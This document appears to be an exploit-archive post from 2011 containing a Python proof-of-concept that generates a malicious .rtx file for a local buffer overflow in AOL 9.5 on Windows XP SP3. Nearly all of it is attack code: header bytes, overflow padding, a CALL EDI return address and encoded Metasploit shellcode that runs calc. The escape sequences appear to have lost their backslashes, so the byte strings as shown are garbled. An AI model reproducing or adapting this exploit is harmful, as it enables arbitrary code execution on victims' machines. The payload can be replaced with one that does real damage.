AOL 9.5 .rtx Local Buffer Overflow
Posted on 01 February 2011
#!/usr/bin/python #Bug : AOL 9.5 (rtx) Local Buffer Overflow Exploit #by sup3r #Tested on : XP SP3 header1 = ( "x3cx48x54x4dx4cx3ex3cx46x4fx4ex54x20x20x53x49x5a" "x45x3dx32x20x50x54x53x49x5ax45x3dx31x30x20x46x41" "x4dx49x4cx59x3dx22x53x41x4ex53x53x45x52x49x46x22" "x20x46x41x43x45x3dx22x41x72x69x61x6cx22x20x4cx41" "x4ex47x3dx22x30x22x3ex3cx41x20x48x52x45x46x3dx22" "x68x74x74x70x3ax2fx2f") header2 = ( "x22x3ex74x65x73x74x3cx2fx41x3ex3cx55x3ex3cx42x52" "x3ex0dx0ax3cx2fx55x3ex3cx2fx46x4fx4ex54x3ex3cx2f" "x48x54x4dx4cx3ex0dx0a") # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x30x42x30x42x30x4bx48x45x54x4ex53x4bx58x4ex47" "x45x30x4ax37x41x30x4fx4ex4bx58x4fx34x4ax31x4bx58" "x4fx55x42x52x41x50x4bx4ex49x54x4bx58x46x53x4bx58" "x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x48x42x4c" "x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx43x46x45x46x52x46x30x45x37x45x4ex4bx58" "x4fx35x46x32x41x50x4bx4ex48x36x4bx48x4ex30x4bx34" "x4bx48x4fx45x4ex31x41x30x4bx4ex4bx58x4ex51x4bx58" "x41x30x4bx4ex49x58x4ex55x46x42x46x30x43x4cx41x53" "x42x4cx46x46x4bx48x42x34x42x53x45x58x42x4cx4ax37" "x4ex30x4bx38x42x44x4ex30x4bx38x42x47x4ex51x4dx4a" "x4bx58x4ax36x4ax30x4bx4ex49x30x4bx58x42x58x42x4b" "x42x30x42x30x42x30x4bx58x4ax56x4ex43x4fx35x41x43" "x48x4fx42x56x48x45x49x48x4ax4fx43x58x42x4cx4bx37" "x42x35x4ax56x50x47x4ax4dx44x4ex43x47x4ax56x4ax59" "x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x46" "x4ex56x43x36x42x50x5a") payload = header1 payload += "x41"*5456 payload += "x75x12" payload += "x44"*14 payload += "x8Dx1Fx94x64" #CALL EDI payload += shellcode payload += header2 try: aol = open("exploit.rtx",'w') aol.write(payload) aol.close() print "Exploit file created! " except: print "Error!"